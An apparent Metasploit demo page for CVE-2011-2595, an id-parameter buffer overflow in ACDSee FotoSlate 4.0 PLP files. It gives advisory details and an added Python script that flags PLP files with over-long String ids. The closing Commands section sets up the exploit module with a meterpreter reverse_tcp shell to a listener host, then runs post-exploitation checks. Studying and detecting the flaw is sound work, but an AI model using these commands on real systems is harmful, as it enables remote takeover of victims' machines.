CVE-2011-2595 ACDSee FotoSlate PLP File id Parameter Overflow Metasploit Demo

Timeline :

Vulnerability discovered by Parvez Anwar
Public release of the vulnerability on 2011-09-12
Metasploit PoC provided on 2011-10-10

PoC provided by :

Parvez Anwar
juan vazquez

Reference(s) :

CVE-2011-2595
OSVDB-75425

Affected version(s) :

ACDSee FotoSlate 4.0 Build 146 is vulnerable, other versions may also be affected.

Tested on Windows XP SP3 with :

ACDSee FotoSlate 4.0 Build 146

Description :

This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via a specially crafted id parameter in a String element. When viewing a malicious PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a buffer and execute arbitrary code. This exploit has been tested on systems such as Windows XP SP3, Windows Vista, and Windows 7.
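Added defender-side example (not part of the original demo or of the Metasploit module): a small Python triage script that flags PLP files in which a String element carries an abnormally long id attribute, the trigger condition described above. Beyond what the page states, it assumes that PLP is XML-like text with <String id="..."> elements; the PhotoLayout/Page wrapper in the sample inputs is constructed, and the 256-byte threshold is a chosen heuristic, not a value from the advisory.

```python
import re
import sys
import xml.etree.ElementTree as ET

# Heuristic threshold (assumption): layout element ids are short names, so an
# id running into hundreds of bytes is worth a closer look.
MAX_ID_LEN = 256

# Fallback pattern for files that are not well-formed XML (truncated or
# deliberately malformed samples still get inspected).
ID_RE = re.compile(rb'<String\b[^>]*?\bid\s*=\s*"([^"]*)"', re.IGNORECASE)

# Constructed sample inputs; the PhotoLayout/Page structure is assumed.
BENIGN_PLP = (b'<?xml version="1.0"?><PhotoLayout><Page>'
              b'<String id="caption1" text="Hello"/></Page></PhotoLayout>')
SUSPECT_PLP = (b'<?xml version="1.0"?><PhotoLayout><Page><String id="'
               + b'A' * 2000 + b'" text="x"/></Page></PhotoLayout>')


def scan_plp_bytes(data: bytes, max_len: int = MAX_ID_LEN) -> list:
    """Return (id_length, preview) for each String element whose id is longer
    than max_len. A real XML parse is tried first; on parse failure the regex
    scan is used so malformed files are not silently skipped."""
    findings = []
    try:
        root = ET.fromstring(data)
        for el in root.iter():
            # Strip any namespace prefix before comparing the tag name.
            if el.tag.split('}')[-1].lower() == 'string':
                val = el.get('id', '')
                if len(val) > max_len:
                    findings.append((len(val), val[:16]))
        return findings
    except ET.ParseError:
        pass
    for m in ID_RE.finditer(data):
        val = m.group(1)
        if len(val) > max_len:
            findings.append((len(val), val[:16].decode('latin-1', 'replace')))
    return findings


def is_suspicious(data: bytes, max_len: int = MAX_ID_LEN) -> bool:
    """True when at least one String id exceeds the length threshold."""
    return bool(scan_plp_bytes(data, max_len))


if __name__ == "__main__":
    # Usage: python plp_triage.py file1.plp [file2.plp ...]
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            hits = scan_plp_bytes(fh.read())
        status = "SUSPICIOUS" if hits else "ok"
        print(f"{path}: {status}", *(f"id_len={n} preview={p!r}" for n, p in hits))
```

The script only measures attribute length; it does not need to know anything about the overflow itself, which keeps it usable as a mail-gateway or sandbox pre-filter for PLP attachments.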

Commands :

use exploit/windows/fileformat/acdsee_fotoslate_string
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo